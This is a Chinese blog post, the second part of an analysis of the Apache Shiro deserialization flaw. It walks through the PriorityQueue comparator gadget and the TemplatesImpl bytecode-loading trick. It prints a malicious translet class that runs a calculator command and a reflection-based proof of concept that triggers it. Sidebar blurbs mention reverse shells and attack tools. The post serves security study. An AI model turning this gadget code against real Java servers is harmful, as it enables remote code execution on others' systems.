Shiro反序列化漏洞原理&代码分析(2)

已于 2024-02-27 10:39:54 修改
阅读量392 收藏 8
点赞数 6
分类专栏: shiro&cc链 文章标签: 安全 系统安全 web安全 安全架构 网络安全 网络攻击模型
于 2024-02-21 16:47:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63217130/article/details/136215597
版权

寻找可readobject对象和链

transform链

这个对象是 PriorityQueue

造成RCE的原因是他的heapify方法 跟进看看

再调用siftDown方法 跟进看看

在comparator != null为true的情况下 调用 siftDownUsingComparator 再跟进看看

调用了comparator.compare()方法

如果前面comparator.compare的comparator是个TransformingComparator类那么就会进入这里调用this.transformer.transform(obj1),而在之前分析的cc1链中我们知道这个transform是可以调用任意类的任意方法导致RCE的,所以我们就需要构造一个合适的PriorityQueue类然后触发这个transform方法配合cc1链的链式调用进行RCE

这是第一种构造poc的链

TemplatesImpl链

这个TemplatesImpl类通常用于XSLT转换过程中,它可以通过Transformer对象加载XSLT文件并编译成一个Templates对象,然后使用这个Templates对象创建Transformer对象来执行具体的转换操作。通俗来讲就是只需要将自己创建的一个对象转换成字节码然后传给他,他就可以调用相应的方法创建该对象,类似反射。

那么如果这个类是个恶意类,有恶意的构造方法,当后面调用到transform的时候,就会创建这个类,再自动调用恶意构造方法就可以RCE了 来看看 这个操作具体是如何实现的

首先我们将一个对象转为字节码

ClassPool classPool = ClassPool.getDefault();
CtClass ctClass = classPool.getCtClass("RCE");
byte[] bytes = ctClass.toBytecode();
System.out.println(bytes);

如图

然后创建对象TemplatesImpl 来将字节码转为 真正的对象 来看看他是如何创建对象的

TemplatesImpl类有一个newTransformer方法 里面调用了方法 getTransletInstance

当 _name == null 为真的时候直接return了 所以我们后期要给name赋值 然后调用 defineTransletClasses(_class肯定不为null)以及_class[_transletIndex].newInstance()即可实例化一个对象了 后面就不用管了

跟进defineTransletClasses 这里要求_bytecodes不能为空 否则抛出错误

首先创建一个类加载器loader,然后用类加载器的loader.defineClass方法,去加载字节码,将一个字节数组中的字节码转换成一个类对象 也就是RCE类

然后newInstance很明显就是实例化对象将RCE类实例化出一个对象,那么RCE类有一个恶意的构造方法,调用即可RCE了 可以看到这个类中执行了 Runtime.getRuntime().exec("calc");

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class RCE extends AbstractTranslet {

    public RCE() {
        super();
        try {
            Runtime.getRuntime().exec("calc");
        }catch (Exception e){
            e.printStackTrace();
        }
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

我们试验一下 这个poc 借鉴了一位师傅的 记得导入 javassist

public class main {
    public static void main(String[] args) throws Exception {

        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("RCE");
        byte[] bytes = ctClass.toBytecode();
        System.out.println(bytes);

        Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
        Constructor<?> constructor = aClass.getDeclaredConstructor(new Class[]{});
        Object TemplatesImpl_instance = constructor.newInstance();

        Field bytecodes = aClass.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(TemplatesImpl_instance , new byte[][]{bytes});

        Field tfactory = aClass.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(TemplatesImpl_instance , new TransformerFactoryImpl());

        Field name = aClass.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(TemplatesImpl_instance , "ting");

        Method method = TemplatesImpl_instance.getClass().getDeclaredMethod("getTransletInstance");
        method.setAccessible(true);
        method.invoke(TemplatesImpl_instance);
        
    }
}

Ting丶丶
关注
专栏目录
Shiro反序列化漏洞
m0_71263989的博客
02-20 977
1、简介Apache Shiro框架是一个功能强大且易于使用的 Java 安全框架,它执行身份验证、授权、加密和会话管理。借助 Shiro 易于理解的 API,您可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。2、原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
shiro反序列化漏洞
2403_82795493的博客
02-19 1030
Apache官方披露Apache Shiro权限绕过漏洞(CVE-2022-32532),当Apache Shiro中使用RegexRequestMatcher进行权限配置,且正则表达式中携带"."时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证,导致配置的权限验证失效。会存在一段base64加密的字段,解码后就是攻击者的回显内容。shiro721的加密key基本猜不到,系统随机生成,可以使用登陆后的rememberMe去爆破正确的key值,即利用有效的RememberMe Cookie作为。
Shiro反序列化漏洞原理&代码分析(3)
qq_63217130的博客
02-27 430
创建PriorityQueue对象 并add TemplatesImpl_instance(RCE类) 以便compare的时候传入RCE类对象然后transform(TemplatesImpl_instance) 去实例化RCE类的对象。相比调用ChainedTransformer的更加transform的POC要简单一些因为不用去链式调用了嘛,我们只用最后调用一下InvokerTransformer的transform方法实例化一个对象就好了。由于我们要调用的链条如下。那么最终poc就是这样的。
shiro反序列化漏洞原理分析
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
10-12 589
原理 AES加密的密钥Key被硬编码在代码里,每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终就会造成反序列化漏洞
Shiro反序列化漏洞原理&代码分析(1)
qq_63217130的博客
02-21 224
我们知道shiro反序列化是他加密cookie的AES密钥硬编码,造成我们可以任意伪造cookie,注入恶意的类反序列化造成的RCE,那么我们就看看如何处理cookie的。所以整个输入是我们可控的接下来就要寻找一个可以反序列化的对象,该对象readobject方法可以造成RCE也就是cc链2的利用了。先是获取请求体中的cookie也就是rememberMe的值。可以看到cookie是可控的然后cookie经过了以下转换。再跟进 就调用了object方法了。
Java代码审计-shiro反序列化漏洞分析
qq_44780157的博客
08-08 1069
Shiro550反序列化漏洞原理分析
shiro反序列化漏洞原理
m0_73649671的博客
05-22 369
shiro反序列化漏洞原理
Shiro 反序列化漏洞原理
weixin_62688091的博客
04-13 308
反序列化,如果成功,则执行恶意代码,构成攻击。攻击者可以构造恶意码,将其序列化。,可以直接反序列化执行恶意代码。在识别身份的时候,需要对。秘钥就不为默认了,需要获取到。在代码中,可以从源码中找到。反序列化的特征:在返回包的。
Shiro反序列化漏洞原理详解及复现,2024年最新0基础Golang开发
2401_84254196的博客
04-18 650
不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!生成CC链,再次按照上述方式发送,执行命令为反弹shell(CC6可打通),注意vulhub靶机本身没有nc,如果使用nc需要先上传。删除JSESSIONID(当该字段存在时,不检测rememberMe),修改rememberMe为加密后的值发送。AES解密,shiro默认加密方式,存在padding oracle攻击及密钥泄露,是可以利用的核心。
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Shiro反序列化漏洞检测工具
01-05
Apache Shiro是一款强大的Java安全框架,它为...通过了解Shiro反序列化漏洞原理和防范措施,我们可以更好地保护我们的系统免受此类攻击。同时,使用提供的检测工具进行定期扫描,也能及时发现并修复潜在的安全隐患。
shiro反序列化漏洞检测工具,含链接教程
08-17
使用方法如描述所示,通过命令行输入`java -jar shiro_tool.jar`后跟目标服务器的URL,工具会尝试识别并测试该服务器是否存在Shiro反序列化漏洞。`readme.txt`可能是提供关于如何使用该工具以及漏洞原理的详细说明。...
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 715
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 601
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
最新发布
weixin_64446270的博客
09-27 1380
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
网络编程(5)——模拟伪闭包实现连接的安全回收
m0_63086198的博客
09-26 1085
new_session通过bind绑定时,new_session的计数就会加一,所以在bind后,new_session的生命周期和新构造函数的生命周期相同,因为新生成的函数对象引用了new_session(new_session通过值传递的方式被复制构造函数使用)。,但是通过bind操作,将new_session作为数值传递给bind函数,而bind函数返回的函数对象内部引用了该new_session所以引用计数增加1,这样保证了new_session不会被释放。今天学习如何通过C11智能指针构造伪。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 704
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
Kotlin:变量声明,null安全,条件语句,函数,类与对象
IH_LZH的博客
09-26 1148
在Kotlin中,对于这些可为null值的变量,Kotlin提供了多种机制来安全地处理它们, 在java中,默认情况下变量是可以为null的,方法的调用者为null时,就会出现空指针异常:NullPointerException
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值